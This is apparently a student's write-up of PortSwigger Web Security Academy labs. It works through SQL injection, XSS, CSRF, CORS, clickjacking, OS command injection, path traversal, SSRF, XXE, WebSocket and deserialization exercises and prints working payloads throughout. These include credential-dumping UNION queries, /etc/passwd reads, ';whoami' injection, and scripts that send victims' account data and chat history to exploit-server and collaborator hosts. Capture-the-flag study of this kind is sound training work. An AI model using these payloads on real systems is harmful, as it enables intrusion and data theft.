# PortSwigger Labs VCS Training Writeup
## SQL Injection [11/18]
### **[APPRENTICE] Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data**
We can try injecting SQL into the `category` parameter with some basic payload, in this case `OR 1=1 --`
Imagine the server search query is as follow:
`SELECT * FROM products WHERE category = 'Accessories'`
Now the query is `SELECT * FROM products WHERE category = '' OR 1=1 --`, which forces all products to reveal due to the `OR 1=1` clause since it is always true.
<br>
### **[APPRENTICE] Lab: SQL injection vulnerability allowing login bypass**
<br>
Login page
Server query could be similar to this:
`SELECT * FROM users WHERE user = 'administrator' AND password = 'password'`
Applying payload `OR 1=1 --` for the password field.
<br>
Success.
<br>
### **[PRACTITIONER] Lab: SQL injection attack, querying the database type and version on Oracle**
Again, we inject SQL to the `category` parameter. As we're using `UNION` attack, first thing to do is to enumerate number of columns.
<br>
Version number is located at `v$version` table.
<br>
<br>
We come to a conclusion that the table has 2 columns. Now retrieve data with payload: `'+UNION+SELECT+BANNER,NULL+FROM+V$VERSION+--`
<br>
### **[PRACTITIONER] Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft**
Using the same enumeration method as above.
<br>
<br>
### **[PRACTITIONER] Lab: SQL injection attack, listing the database contents on non-Oracle databases**
Test with payload `' UNION SELECT '1','2' FROM information_schema.tables --`.
<br>
Dumping all tables' names.
`'+UNION+SELECT+table_name,NULL+FROM+information_schema.tables+--`
<br>
We found a suspicious table name `users_jvktfa`.
Payload to dump data: `' UNION SELECT * FROM users_jvktfa--`
Attained administrator credentials!!
<br>
### **[PRACTITIONER] Lab: SQL injection attack, listing the database contents on Oracle**
Payload: `' UNION SELECT 'a','b' FROM dual--`
Table has 2 columns.
<br>
Payload: `'+UNION+SELECT+table_name,NULL+FROM+all_tables--`
Got all tables' names.
Payload: `' UNION SELECT * FROM USERS_GWBTSX--`
Attained administrator's credential.
<br>
### **[PRACTITIONER] Lab: SQL injection UNION attack, determining the number of columns returned by the query**
Simply inserting values until returns no error.
This means table has 3 columns.
<br>
### **[PRACTITIONER] Lab: SQL injection UNION attack, finding a column containing text**
Enumerate number of columns with payload: `' UNION SELECT NULL,NULL,NULL--`
Table has 3 columns.<br>
Now fuzz for any interesting data. We'll use the method hinted by PortSwigger.
<br>
`' UNION SELECT NULL,'a',NULL--` returns no error, which means this column is string-compatible.
<br>
Now replace 'a' with 'c1pXgI' to solve the lab.
<br>
### **[PRACTITIONER] Lab: SQL injection UNION attack, retrieving data from other tables**
As the lab suggest, we have to retrieve data from `users` table, with 2 columns `username` and `password`.
<br>
Payload: `' UNION SELECT username,password FROM users--`
<br>
### **[PRACTITIONER] Lab: SQL injection UNION attack, retrieving multiple values in a single column**
`' UNION SELECT NULL,'a'--`
This means second columns is string-compatible.
<br>
<br>
`' UNION SELECT NULL,username || ' ' || password FROM users--`
<br>
### **[PRACTITIONER] Lab: Blind SQL injection with conditional responses**
## Cross-site scripting
### **[APPRENTICE] Lab: Reflected XSS into HTML context with nothing encoded**
<br>
<br>
### **[APPRENTICE] Lab: Stored XSS into HTML context with nothing encoded**
<br>
### **[APPRENTICE] Lab: DOM XSS in document.write sink using source location.search**
<br>
Inspect elements reveals the search function.
New search query will be put inside the `<img>` tag.
```htmlembedded
<img src="/resources/images/tracker.gif?searchTerms='+query+'">
```
We add `">` to break the `img` tag, then add whatever after to trigger the XSS.
<br>
This payload works for this example.
```htmlmixed
"><image/src/onerror=prompt(8)>
```
<br>
<br>
### **[APPRENTICE] Lab: DOM XSS in innerHTML sink using source location.search**
<br>
`<script>alert("dak dak buh buh lmao")</script>`. Payload like this won't be executed.
Instead, we will try to trigger an error, and make the browser execute that. In this case:
`<image/src/onerror=prompt(8)>` works.
<br>
### **[APPRENTICE] Lab: DOM XSS in jQuery anchor href attribute sink using location.search source**
Source code of `Back` button.
Basically, we can change attribute of DOM elements with jQuery's `attr()` function, which also means we can manipulate values sent. Change URL parameter `returnPath` with `javascript:alert(document.domain)`, then click on the `Back` button to execute the malicious script.
<br>
### **[APPRENTICE] Lab: Reflected XSS into attribute with angle brackets HTML-encoded**
Search query will be inserted into `value` attribute, thus we manipulate the logic here with
`bruh" onmouseover="alert(1)`.
- `bruh"` is to close `value` attribute
- `onmouseover="alert(1)` will trigger when we hover upon the search box
<br>
Reload the page for the payload to take effect.
<br>
### **[APPRENTICE] Lab: Stored XSS into anchor href attribute with double quotes HTML-encoded**
Author's website will be included in the `href` tag. Manipulate this by inserting javascript.
<br>
Now try clicking on author's name will trigger the script.
<br>
### **[APPRENTICE] Lab: Reflected XSS into a JavaScript string with angle brackets HTML encoded**
Search query will be automatically URL-encoded, except:
Payload: '*alert(1)*'
<br>
### **[PRACTITIONER] Lab: DOM XSS in document.write sink using source location.search inside a select element**
Focus on store display script.
We'll want to exploit the `document.write()` function.
`document.write('<select name="storeId">');`
Payload:
```htmlembedded
"></select><img src=1 onerror=alert(1)>
```
Explanation:
Firstly, close the `<select` tag with `"></select>`
Then trigger XSS with `<img src=1 onerror=alert(1)>`
Now the command will be like this: `document.write('<select name=""></select><img src=1 onerror=alert(1)>">')`
<br>
### **[PRACTITIONER] Lab: DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded**
Based on a StackOverflow answer:
<br>
### **[PRACTITIONER] Lab: Stored DOM XSS**
Take a look at `escapeHTML()` function.
In JS, `replace()` only replace by first occurrence of character.
Truly one of the JS moments :rolling_on_the_floor_laughing:.
We can exploit this by using: `<><img src=69 onerror=alert(1)>`.
<br>
## Cross-site request forgery (CSRF) [3/12]
### **[APPRENTICE] Lab: CSRF vulnerability with no defenses**
Exploit code:
```htmlembedded
<form method="POST" action="https://0a4700f7047873e18198f220001900a9.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="nano@nichijou">
</form>
<script>
document.forms[0].submit();
</script>
```
<br>
### **[PRACTITIONER] Lab: CSRF where token validation depends on request method**
```htmlembedded
<form action="https://0ade00df03a844fe8045b251007a009c.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="hehe@xd">
</form>
<script>
document.forms[0].submit();
</script>
```
<br>
### **[PRACTITIONER] Lab: CSRF where token validation depends on token being present**
Exploit code
```htmlembedded
<form method="POST" action="https://0aa300c80496330d82c8ed0f002600cc.web-security-academy.net/my-account/change-email">
<input type="hidden" name="$param1name" value="$param1value">
</form>
<script>
document.forms[0].submit();
</script>
```
## Clickjacking [/]
### **[APPRENTICE] Lab: Basic clickjacking with CSRF token protection**
## DOM-based vulnerabilities [5/7]
### **[PRACTITIONER] Lab: DOM XSS using web messages**
Website has an odd `[object Object]` on top.
<br>
Attach with it is a script, using `addEventListener` to receive message sent to window, afterwards a DOM element is changed.
No sanitization is used, messages are taken raw.
<br>
Payload: `<iframe src="https://0a1a006a03ac999385f3f61000140089.web-security-academy.net/" onload="contentWindow.postMessage('<img src=1 onerror=print()>', 'https://0a1a006a03ac999385f3f61000140089.web-security-academy.net')">`
Using `<iframe>` tag to inject an inline frame to page (simply because `<script>` does not work :v), and `onload` attribute will load the malicious script, in this case `contentWindow.postMessage()`.
`<img src=1 onerror=print()>` will fail to load properly, and trigger `onerror`.
<br>
### **[PRACTITIONER] Lab: DOM XSS using web messages and a JavaScript URL**
This script will listen to messages sent, and if message contains an URL, returns the URL of website.
This does not check if it's valid URL.
Payload: `<iframe src="https://0a0100f30473050580190d630015003f.web-security-academy.net/" onload="contentWindow.postMessage('javascript:print()//http:', 'https://0a0100f30473050580190d630015003f.web-security-academy.net/')">`
<br>
### **[PRACTITIONER] Lab: DOM XSS using web messages and `JSON.parse`**
Webpage will constantly listening for new message, in this case a JSON, then parse using `JSON.parse` and pass to `switch` statement.
What we want to do here is to inject JS into `d.url`, as it is the only injectable parameter.
Payload: `<iframe src=https://0af400f2041a195c8018089000010028.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'>`
`d.url` is called in `load-channel` case, hence the `"type": "load-channel"` and `'url'` will carry our payload, `"url": "javascript:print()"`
<br>
### **[PRACTITIONER] Lab: DOM-based open redirection**
Webpage contains a `url` parameter that can be redirected, we can use this to redirect to any arbitrary URL of us.
Payload: `https://0a9000af03da63e88477b8f60051000d.web-security-academy.net/post?postId=8&url=https://exploit-0aa3000103966328849fb70901270077.exploit-server.net/`
<br>
### **[PRACTITIONER] Lab: DOM-based cookie manipulation**
Exploit script:
```htmlembedded
<iframe src="https://0a6b008303233e1c808562ec00b40033.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://0a6b008303233e1c808562ec00b40033.web-security-academy.net';window.x=1;">
```
<br>
<br>
## Cross-origin resource sharing (CORS) [3/4]
### **[APPRENTICE] Lab: CORS vulnerability with basic origin reflection**
Exploit:
```javascript=
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://0abf00f4030143e080d0fd63000900de.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='/log?key='+this.responseText;
};
</script>
```
Click on `Deliver exploit to victim`.
<br>
Data recorded in access log.
<br>
<br>
<br>
## **[APPRENTICE] Lab: CORS vulnerability with trusted null origin**
Exploit script:
```javascript=
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://0a1e000804a681e081cc523c004b001e.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='https://exploit-0a0b00ce040b810281ad51d001f00007.exploit-server.net//log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
```
<br>
Click on `Deliver exploit to victim`.
<br>
<br>
<br>
## **[PRACTITIONER] Lab: CORS vulnerability with trusted insecure protocols**
Exploit script
```javascript=
<script>
document.location="https://stock.0a000093048cd5c884b10f82009e00ff.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0a000093048cd5c884b10f82009e00ff.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0a69004b04eed56d846c0ed301dd000d.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
```
## Clickjacking [3/5]
### **[APPRENTICE] Lab: Basic clickjacking with CSRF token protection**
Exploit script:
```htmlembedded
<style>
iframe {
position:relative;
width: 1000;
height: 700;
opacity: 0.00001;
z-index: 2;
}
div {
position:absolute;
top: 515;
left: 60;
z-index: 1;
}
</style>
<div>CLICK ME PRETTY PLSS</div>
<iframe src="https://0ae900940450a3ec80a108460070008f.web-security-academy.net/my-account"></iframe>
```
<br>
<br>
<br>
### **[APPRENTICE] Lab: Clickjacking with form input data prefilled from a URL parameter**
Exploit code:
```htmlembedded
<style>
iframe {
position:relative;
width: 1000;
height: 700;
opacity: 0.0001;
z-index: 2;
}
div {
position:absolute;
top: 400;
left: 80;
z-index: 1;
}
</style>
<div>CLICK ME PLSSSSSSSSSS</div>
<iframe src="https://0a62000f04e85cce8976b80b00710048.web-security-academy.net/my-account?email=hacker@attacker-website.com"></iframe>
```
<br>
### **[PRACTITIONER] Exploiting clickjacking vulnerability to trigger DOM-based XSS**
Exploit code:
```htmlembedded
<style>
iframe {
position:relative;
width: 500;
height: 700;
opacity: 0.00001;
z-index: 2;
}
div {
position:absolute;
top: 610;
left: 80;
z-index: 1;
}
</style>
<div>Test me</div>
<iframe
src="https://0ad90041047b86c483f9bf5200690090.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>
```
## OS command injection [4/5]
### **[APPRENTICE] Lab: OS command injection, simple case**
Add `;whoami` after `storeId` parameter.
Payload: `https://0adc006c03b2e76783c2936e00db00b6.web-security-academy.net/product?productId=3&storeId=1;whoami`
<br>
### **[PRACTITIONER] Lab: Blind OS command injection with time delays**
Open Burp Suite, intercept the submission.
Add `||sleep+10||` after any parameters would work.
<br>
### **[PRACTITIONER] Lab: Blind OS command injection with output redirection**
<br>
<br>
<br>
### **[PRACTITIONER] Lab: Blind OS command injection with out-of-band interaction**
<br>
## Path traversal [6/6]
### **[APPRENTICE] Lab: File path traversal, simple case**
Payload: `../../../etc/passwd`
Inject payload via `?filename` parameter.
<br>
<br>
### **[PRACTITIONER] Lab: File path traversal, traversal sequences blocked with absolute path bypass**
Read file using absolute path: `/etc/passwd`
<br>
<br>
### **[PRACTITIONER] Lab: File path traversal, traversal sequences stripped non-recursively**
Payload: `....//....//....//etc/passwd`
No source code was provided, so we could assume that the website sanitize path traversal by stripping all `../` sequence. In this case, input is sanitized non-recursively, we can tackle this by `....//`, which will be truncated to `../`.
<br>
### **[PRACTITIONER] Lab: File path traversal, traversal sequences stripped with superfluous URL-decode**
Common payload for URL-encoded path traversal is `%2f`. However, it does not work this time, I assume the backend recursively decodes the URL, so we need to double-encode the path with `%252f`.
Payload: `..%252f..%252f..%252fetc/passwd`
<br>
### **[PRACTITIONER] Lab: File path traversal, validation of start of path**
Payload: `/var/www/images/../../../etc/passwd`
All files requested outside of `/var/www/images/` are not displayed, so we simply traverse back to the desired file using `..`
<br>
### **[PRACTITIONER] Lab: File path traversal, validation of file extension with null byte bypass**
Source: https://www.thehacker.recipes/web/inputs/null-byte-injection
Payload: `../../../../etc/passwd%00.png`
<br>
## Access control vulnerabilities [7/13]
### **[APPRENTICE] Lab: Unprotected admin functionality**
dirsearch reveals a `robots.txt` file.
Hidden admin panel.
Click `Delete` to finish.
<br>
### **[APPRENTICE] Lab: Unprotected admin functionality with unpredictable URL**
Page source contains path to admin panel.
<br>
<br>
<br>
### **[APPRENTICE] Lab: User role controlled by request parameter**
Change `Admin` value to `true`.
Logged in!
<br>
### **[APPRENTICE] Lab: User role can be modified in user profile**
Log in as `wiener` user.
Intercept the email change process, add `roleid` to JSON.
Back to admin panel and delete user `carlos`.
<br>
### **[APPRENTICE] Lab: User ID controlled by request parameter**
Login as wiener user.
<br>
Notice that we can change id is denoted with `id` parameter.
<br>
Change id to `carlos`.
API key retrieved.
### **[APPRENTICE] Lab: User ID controlled by request parameter, with unpredictable user IDs**
User id is generated with random unpredictable pattern.
<br>
Back to home, find a blog post by carlos.
<br>
Leaked user id.
<br>
Logged in.
<br>
<br>
### **[APPRENTICE] Lab: Insecure direct object references**
Vulnerability is in live chat feature.
<br>
<br>
We can exploit IDOR vuln by changing file name to `1.txt`, since we can only download file with index from 2, therefore `1.txt` is the secret file.
<br>
We successfully leaked other people's transcript.
<br>
<br>
## File upload vulnerabilities [2/7]
### **[APPRENTICE] Lab: Remote code execution via web shell upload**
We can achieve RCE by exploiting file upload vuln via uploading avatar.
<br>
Crafting a simple web shell.
<br>
Upload success.
Avatars are served at `/files/avatars/`. Head to that and find our webshell. Our shell is made to be controlled with parameter `c`.
Try executing `whoami`.
Goal of this lab is to get carlos' secret at `/home/carlos/secret`.
<br>
<br>
<br>
### **[APPRENTICE] Lab: Web shell upload via Content-Type restriction bypass**
Similar to previous lab, we can upload files, but restricted to only jpeg and png.
<br>
<br>
Files uploaded are filtered using `Content-Type` header to accept images only.
We can tackle this by altering `application/octet-stream` to `image/png`.
<br>
<br>
<br>
<br>
<br>
## Information disclosure [4/5]
### **[APPRENTICE] Lab: Information disclosure in error messages**
Change `productId` to `'` and observe the error.
### **[APPRENTICE] Lab: Information disclosure on debug page**
Debug page is at `/cgi-bin/phpinfo.php`.
<br>
<br>
<br>
### **[APPRENTICE] Lab: Source code disclosure via backup files**
Firstly, I checked `robots.txt` if there's any info.
There exist a folder name `/backup`.
Inside is a backup file `ProductTemplate.java.bak`.
<br>
Credentials are hard-coded into the source code.
<br>
<br>
<br>
### **[PRACTITIONER] Lab: Information disclosure in version control history**
Lab name implies existence of `.git` (or `.hg`). I tried with `.git` and it worked.
<br>
<br>
<br>
## Business logic vulnerabilities [4/11]
### **[APPRENTICE] Lab: Excessive trust in client-side controls**
Intercept add to cart process, notice we can change item price.
Edit `price` to 1.
<br>
<br>
### **[APPRENTICE] Lab: High-level logic vulnerability**
Notice we can control `quantity` value to lower the total price. E.g:
Changing `quantity` to a negative value.
Total price has been deducted to under $100 that we can purchase.
<br>
### **[APPRENTICE] Lab: Inconsistent security controls**
Dirsearch reveals `/admin` panel, although can only be accessed with `@dontwannacry.com` mail.
<br>
Email can be changed in `My account` page.
<br>
Now we're authorized to access admin panel.
<br>
<br>
<br>
### **[APPRENTICE] Lab: Flawed enforcement of business rules**
Newly registered account can use this code at checkout.
<br>
Signing up to newsletter also gives us a coupon.
<br>
Apparently, applying the same code twice in a row is not allowed(source: trust me bro :D), we can abuse the coupon system by alternating between the coupons.
<br>
<br>
## NoSQL injection [2/4]
### **[APPRENTICE] Lab: Detecting NoSQL injection**
NoSQL tends to be MongoDB, we can circumvent this by using evaluation that's always results to true.
Payload: `Accessories'||1||'`
<br>
<br>
### **[APPRENTICE] Lab: Exploiting NoSQL operator injection to bypass authentication**
Intercepting the login process.
<br>
<br>
Assume that admin account starts with ad.*, we can try using regex match to match username to that of admin account.
<br>
<br>
<br>
## Server-side request forgery (SSRF) [5/7]
### **[APPRENTICE] Lab: Basic SSRF against the local server**
Intercept `checkStock` request.
<br>
Change `stockApi`'s value `http://localhost/admin`
<br>
<br>
Delete user `carlos` with `http://localhost/admin/delete?username=carlos`
<br>
<br>
### **[APPRENTICE] Lab: Basic SSRF against another back-end system**
Intercept `Check stock`, send to `Intruder`.
<br>
<br>
Select payload, then start attack.
<br>
Payload `248` revealed an admin panel.
<br>
Send request to `Repeater`, append `/admin/delete?username=carlos` to `stockApi`'s value.
<br>
<br>
### **[PRACTITIONER] Lab: Blind SSRF with out-of-band detection**
Visit product, intercept and send to `Repeater`.
<br>
Insert Collaborator Payload.
<br>
Click `Send`.
Go to `Collaborator` tab, click `Poll now`.
<br>
<br>
### **[PRACTITIONER] Lab: SSRF with blacklist-based input filter**
Intercept `Check stock` and send to `Repeater`.
Change `stockApi`'s value to `http://127.1/%2561dmin`.
<br>
Now we can view admin's panel. Delete user `carlos` with `http://127.1/%2561dmin/delete?username=carlos`
<br>
### **[PRACTITIONER] Lab: SSRF with filter bypass via open redirection vulnerability**
Intercept `Check stock`.
<br>
## XML external entity (XXE) injection [7/9]
### **[APPRENTICE] Lab: Exploiting XXE using external entities to retrieve files**
Source: https://github.com/payloadbox/xxe-injection-payload-list
<br>
<br>
### **[APPRENTICE] Lab: Exploiting XXE to perform SSRF attacks** [/9]
<br>
This leads to info leakage, in this case, folder's name.
<br>
<br>
<br>
<br>
<br>
### **[PRACTITIONER] Lab: Blind XXE with out-of-band interaction**
This lab requires burp collaborator.
Add entity to XML data:
`<!DOCTYPE stockCheck [ <!ENTITY ent SYSTEM "http://wnnjg11iyi477u7pxf9gmjcv4mady3ms.oastify.com"> ]>`
<br>
<br>
<br>
### **[PRACTITIONER] Lab: Blind XXE with out-of-band interaction via XML parameter entities**
<br>
Payload: `<!DOCTYPE test [<!ENTITY % test SYSTEM "https://5ekkoo5zy1xbnf7bs3oh1akmadg44ysn.oastify.com"> %test; ]>`
<br>
<br>
<br>
### **[PRACTITIONER] Lab: Exploiting XInclude to retrieve files**
Capture `POST` request to check stock button, replace `productId` value with `<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
`
<br>
<br>
<br>
### **[PRACTITIONER] Lab: Exploiting XXE via image file upload**
Create a SVG as follow:
`<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
`
Click on random post, choose the `.svg` file we created earlier.
<br>
Go back to post's comment section, now content of file is in your avatar.
<br>
<br>
## WebSockets [3/3]
### **[APPRENTICE] Lab: Manipulating WebSocket messages to exploit vulnerabilities**
Intercept message.
<br>
Edit message with `<img src=1 onerror='alert(1)'>`, click `Forward`.
<br>
<br>
### **[PRACTITIONER] Lab: Cross-site WebSocket hijacking**
Exploit script:
```htmlembedded
<script>
var ws = new WebSocket('wss://0ade00510485f9e3836615940068004d.web-security-academy.net/chat');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https//d9nsjw07t9sjin2jnbjpwifu5lbez4nt.oastify.com, {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>
```
To `Collaborator` tab, click `Poll now`.
Search for every chat, found the password.
<br>
<br>
### **[PRACTITIONER] Lab: Manipulating the WebSocket handshake to exploit vulnerabilities**
Use `X-Forwarded-For: 1.1.1.1` to spoof IP.
<br>
Obfuscate payload.
<br>
<br>
## Insecure deserialization [/10]
### **[APPRENTICE] Lab: Modifying serialized objects**
Login, decode cookie.
<br>
Change `b:0` to `b:1`, then encode cookie again.
<br>
Replace cookie.
<br>
<br>
### **[PRACTITIONER] Lab: Modifying serialized data types**
Base64 decode existing cookie and modify as follow:
`O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}`
Then base64 encode again.
New cookie: `Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjEzOiJhZG1pbmlzdHJhdG9yIjtzOjEyOiJhY2Nlc3NfdG9rZW4iO2k6MDt9Cg%3d%3d`.
Replace new cookie and reload page.
<br>
<br>
Sign in with Wallet
Connect another wallet